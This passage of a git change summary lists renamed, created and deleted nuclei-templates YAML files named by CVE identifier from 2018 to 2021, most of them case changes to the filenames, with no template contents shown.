=> CVE-2018-15745.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-15961.yaml => CVE-2018-15961.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16059.yaml => CVE-2018-16059.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16133.yaml => CVE-2018-16133.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16167.yaml => CVE-2018-16167.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16288.yaml => CVE-2018-16288.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-16299.yaml => CVE-2018-16299.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-16341.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-16671.yaml rename nuclei-templates/CVE-2018/{cve-2018-17422.yaml => CVE-2018-17422.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18069.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18608.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18775.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18777.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-18778.yaml rename nuclei-templates/CVE-2018/{cve-2018-18925.yaml => CVE-2018-18925.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19137.yaml rename nuclei-templates/CVE-2018/{cve-2018-19326.yaml => CVE-2018-19326.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19365.yaml rename nuclei-templates/CVE-2018/{cve-2018-19458.yaml => CVE-2018-19458.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19751.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-19753.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-19914.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-20009.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-20011.yaml rename nuclei-templates/CVE-2018/{cve-2018-2893.yaml => CVE-2018-2893.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-2894.yaml => CVE-2018-2894.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-5233.yaml => CVE-2018-5233.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-6200.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-6910.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7422.yaml rename nuclei-templates/CVE-2018/{cve-2018-7602.yaml => CVE-2018-7602.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-7662.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7700.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-7719.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-8033.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-8719.yaml rename nuclei-templates/CVE-2018/{cve-2018-9118.yaml => CVE-2018-9118.yaml} (100%) rename nuclei-templates/CVE-2018/{CVE-2018-1000226.yaml => cve-2018-1000226.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-1000856.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-1000861.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-10230.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-10956.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-11231.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-11776.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-11784.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-12300.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-12613.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-1271.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-13379.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-13980.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-14916.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-15473.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-15657.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-16341.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-16671.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18069.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18608.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18775.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18777.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-18778.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19137.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19365.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19751.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-19753.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-19914.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-20009.yaml delete mode 100644 nuclei-templates/CVE-2018/cve-2018-20011.yaml rename nuclei-templates/CVE-2018/{CVE-2018-6008.yaml => cve-2018-6008.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-6200.yaml rename nuclei-templates/CVE-2018/{CVE-2018-6389.yaml => cve-2018-6389.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/cve-2018-6910.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-7422.yaml rename nuclei-templates/CVE-2018/{CVE-2018-7467.yaml => cve-2018-7467.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/cve-2018-7662.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-7700.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-7719.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-8033.yaml create mode 100644 nuclei-templates/CVE-2018/cve-2018-8719.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-0221.yaml rename nuclei-templates/CVE-2019/{cve-2019-10232.yaml => CVE-2019-10232.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-10475.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-10717.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-10758.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-11013.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-11043.yaml rename nuclei-templates/CVE-2019/{cve-2019-11248.yaml => CVE-2019-11248.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-11370.yaml rename nuclei-templates/CVE-2019/{cve-2019-11580.yaml => CVE-2019-11580.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-12725.yaml => CVE-2019-12725.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-13392.yaml => CVE-2019-13392.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-13396.yaml rename nuclei-templates/CVE-2019/{cve-2019-13462.yaml => CVE-2019-13462.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-14223.yaml => CVE-2019-14223.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-14251.yaml rename nuclei-templates/CVE-2019/{cve-2019-14312.yaml => CVE-2019-14312.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-14470.yaml => CVE-2019-14470.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-14696.yaml rename nuclei-templates/CVE-2019/{cve-2019-14974.yaml => CVE-2019-14974.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-15107.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-15811.yaml rename nuclei-templates/CVE-2019/{cve-2019-16278.yaml => CVE-2019-16278.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-1653.yaml rename nuclei-templates/CVE-2019/{cve-2019-16759.yaml => CVE-2019-16759.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-16932.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-16996.yaml rename nuclei-templates/CVE-2019/{cve-2019-17538.yaml => CVE-2019-17538.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-17558.yaml => CVE-2019-17558.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-18393.yaml => CVE-2019-18393.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-18665.yaml rename nuclei-templates/CVE-2019/{cve-2019-18818.yaml => CVE-2019-18818.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-19908.yaml => CVE-2019-19908.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-19985.yaml rename nuclei-templates/CVE-2019/{cve-2019-20085.yaml => CVE-2019-20085.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-20210.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-20354.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-20933.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-2616.yaml rename nuclei-templates/CVE-2019/{cve-2019-2767.yaml => CVE-2019-2767.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-3396.yaml => CVE-2019-3396.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-3799.yaml => CVE-2019-3799.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-3912.yaml rename nuclei-templates/CVE-2019/{cve-2019-7219.yaml => CVE-2019-7219.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7254.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7315.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-7609.yaml delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-8442.yaml rename nuclei-templates/CVE-2019/{cve-2019-8449.yaml => CVE-2019-8449.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-8451.yaml rename nuclei-templates/CVE-2019/{cve-2019-8903.yaml => CVE-2019-8903.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-8937.yaml => CVE-2019-8937.yaml} (100%) rename nuclei-templates/CVE-2019/{cve-2019-8982.yaml => CVE-2019-8982.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/CVE-2019-9041.yaml rename nuclei-templates/CVE-2019/{cve-2019-9726.yaml => CVE-2019-9726.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9915.yaml create mode 100644 nuclei-templates/CVE-2019/CVE-2019-9922.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-0221.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-10475.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-10717.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-10758.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-11013.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-11043.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-11370.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-13396.yaml rename nuclei-templates/CVE-2019/{CVE-2019-14205.yaml => cve-2019-14205.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-14251.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-14696.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-15107.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-15811.yaml rename nuclei-templates/CVE-2019/{CVE-2019-15859.yaml => cve-2019-15859.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-16332.yaml => cve-2019-16332.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-1653.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-16932.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-16996.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-18665.yaml rename nuclei-templates/CVE-2019/{CVE-2019-19134.yaml => cve-2019-19134.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-19985.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-20210.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-20354.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-20933.yaml rename nuclei-templates/CVE-2019/{CVE-2019-2588.yaml => cve-2019-2588.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-2616.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-3912.yaml rename nuclei-templates/CVE-2019/{CVE-2019-7192.yaml => cve-2019-7192.yaml} (100%) rename nuclei-templates/CVE-2019/{CVE-2019-7238.yaml => cve-2019-7238.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-7254.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7315.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-7609.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-8442.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-8451.yaml create mode 100644 nuclei-templates/CVE-2019/cve-2019-9041.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9915.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9922.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-10220.yaml rename nuclei-templates/CVE-2020/{cve-2020-10549.yaml => CVE-2020-10549.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-1147.yaml => CVE-2020-1147.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-11529.yaml => CVE-2020-11529.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-11978.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-11991.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-12271.yaml rename nuclei-templates/CVE-2020/{cve-2020-12720.yaml => CVE-2020-12720.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-13117.yaml => CVE-2020-13117.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-13121.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-13945.yaml rename nuclei-templates/CVE-2020/{cve-2020-14750.yaml => CVE-2020-14750.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-14883.yaml => CVE-2020-14883.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15004.yaml => CVE-2020-15004.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15129.yaml => CVE-2020-15129.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-15227.yaml rename nuclei-templates/CVE-2020/{cve-2020-15500.yaml => CVE-2020-15500.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15505.yaml => CVE-2020-15505.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15568.yaml => CVE-2020-15568.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-16846.yaml rename nuclei-templates/CVE-2020/{cve-2020-16952.yaml => CVE-2020-16952.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17518.yaml => CVE-2020-17518.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-17519.yaml => CVE-2020-17519.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-18268.yaml => CVE-2020-18268.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-1938.yaml => CVE-2020-1938.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-1943.yaml => CVE-2020-1943.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-2096.yaml rename nuclei-templates/CVE-2020/{cve-2020-2103.yaml => CVE-2020-2103.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-21224.yaml => CVE-2020-21224.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-2140.yaml => CVE-2020-2140.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-2199.yaml => CVE-2020-2199.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22208.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22210.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22211.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-22840.yaml rename nuclei-templates/CVE-2020/{cve-2020-23015.yaml => CVE-2020-23015.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-23517.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-23575.yaml rename nuclei-templates/CVE-2020/{cve-2020-23972.yaml => CVE-2020-23972.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-24186.yaml rename nuclei-templates/CVE-2020/{cve-2020-24312.yaml => CVE-2020-24312.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24550.yaml => CVE-2020-24550.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24571.yaml => CVE-2020-24571.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24765.yaml => CVE-2020-24765.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-24949.yaml => CVE-2020-24949.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-25223.yaml => CVE-2020-25223.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-25780.yaml => CVE-2020-25780.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-25864.yaml rename nuclei-templates/CVE-2020/{cve-2020-26413.yaml => CVE-2020-26413.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-27361.yaml rename nuclei-templates/CVE-2020/{cve-2020-28188.yaml => CVE-2020-28188.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-28208.yaml => CVE-2020-28208.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-28351.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-29597.yaml rename nuclei-templates/CVE-2020/{cve-2020-3187.yaml => CVE-2020-3187.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-35234.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35489.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-3580.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35847.yaml rename nuclei-templates/CVE-2020/{cve-2020-35951.yaml => CVE-2020-35951.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-36112.yaml rename nuclei-templates/CVE-2020/{cve-2020-36365.yaml => CVE-2020-36365.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-36510.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-4038.yaml rename nuclei-templates/CVE-2020/{cve-2020-4463.yaml => CVE-2020-4463.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5284.yaml => CVE-2020-5284.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-5307.yaml => CVE-2020-5307.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5410.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5776.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-5777.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-6207.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-6287.yaml rename nuclei-templates/CVE-2020/{cve-2020-7136.yaml => CVE-2020-7136.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7209.yaml => CVE-2020-7209.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7246.yaml => CVE-2020-7246.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-7961.yaml => CVE-2020-7961.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8115.yaml rename nuclei-templates/CVE-2020/{cve-2020-8163.yaml => CVE-2020-8163.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8191.yaml rename nuclei-templates/CVE-2020/{cve-2020-8209.yaml => CVE-2020-8209.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8512.yaml rename nuclei-templates/CVE-2020/{cve-2020-8771.yaml => CVE-2020-8771.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-8813.yaml => CVE-2020-8813.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8982.yaml rename nuclei-templates/CVE-2020/{cve-2020-9036.yaml => CVE-2020-9036.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9376.yaml => CVE-2020-9376.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-9402.yaml => CVE-2020-9402.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-10220.yaml rename nuclei-templates/CVE-2020/{CVE-2020-11455.yaml => cve-2020-11455.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-11546.yaml => cve-2020-11546.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-11978.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-11991.yaml rename nuclei-templates/CVE-2020/{CVE-2020-12054.yaml => cve-2020-12054.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-12271.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-13121.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-13945.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-16846.yaml rename nuclei-templates/CVE-2020/{CVE-2020-17362.yaml => cve-2020-17362.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-2096.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22208.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22210.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22211.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-22840.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-23517.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-23575.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-24186.yaml rename nuclei-templates/CVE-2020/{CVE-2020-24391.yaml => cve-2020-24391.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-25864.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-27361.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-28351.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-29597.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-35234.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-35489.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-3580.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-35847.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-36112.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-36510.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-4038.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-5410.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-5776.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-5777.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-6207.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-6287.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8115.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8191.yaml rename nuclei-templates/CVE-2020/{CVE-2020-8497.yaml => cve-2020-8497.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-8512.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-8982.yaml rename nuclei-templates/CVE-2020/{CVE-2020-9054.yaml => cve-2020-9054.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-9757.yaml => cve-2020-9757.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-20200924a.yaml => cve-20200924a.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-1498.yaml => CVE-2021-1498.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-1499.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20031.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20090.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20091.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20092.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20792.yaml rename nuclei-templates/CVE-2021/{cve-2021-21234.yaml => CVE-2021-21234.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21745.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21799.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21801.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21802.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21805.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21973.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21985.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-22502.yaml rename nuclei-templates/CVE-2021/{cve-2021-24176.yaml => CVE-2021-24176.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24226.yaml rename nuclei-templates/CVE-2021/{cve-2021-24237.yaml => CVE-2021-24237.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24274.yaml => CVE-2021-24274.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24276.yaml rename nuclei-templates/CVE-2021/{cve-2021-24278.yaml => CVE-2021-24278.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24284.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24288.yaml rename nuclei-templates/CVE-2021/{cve-2021-24291.yaml => CVE-2021-24291.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24316.yaml rename nuclei-templates/CVE-2021/{cve-2021-24358.yaml => CVE-2021-24358.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24488.yaml rename nuclei-templates/CVE-2021/{cve-2021-24499.yaml => CVE-2021-24499.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24510.yaml rename nuclei-templates/CVE-2021/{cve-2021-24746.yaml => CVE-2021-24746.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24762.yaml => CVE-2021-24762.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-24838.yaml => CVE-2021-24838.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24926.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25033.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25063.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25085.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25112.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25281.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25646.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26247.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26598.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26855.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-27132.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-27519.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-27561.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28149.yaml rename nuclei-templates/CVE-2021/{cve-2021-28150.yaml => CVE-2021-28150.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28151.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-28164.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-28377.yaml rename nuclei-templates/CVE-2021/{cve-2021-28918.yaml => CVE-2021-28918.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-29203.yaml rename nuclei-templates/CVE-2021/{cve-2021-29441.yaml => CVE-2021-29441.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-29442.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-29484.yaml rename nuclei-templates/CVE-2021/{cve-2021-29622.yaml => CVE-2021-29622.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-29625.yaml => CVE-2021-29625.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-30049.yaml => CVE-2021-30049.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-3019.yaml => CVE-2021-3019.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-31249.yaml => CVE-2021-31249.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31537.yaml rename nuclei-templates/CVE-2021/{cve-2021-31581.yaml => CVE-2021-31581.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31589.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-31856.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-3223.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-32305.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-32853.yaml rename nuclei-templates/CVE-2021/{cve-2021-3297.yaml => CVE-2021-3297.yaml} (100%) delete mode 100644 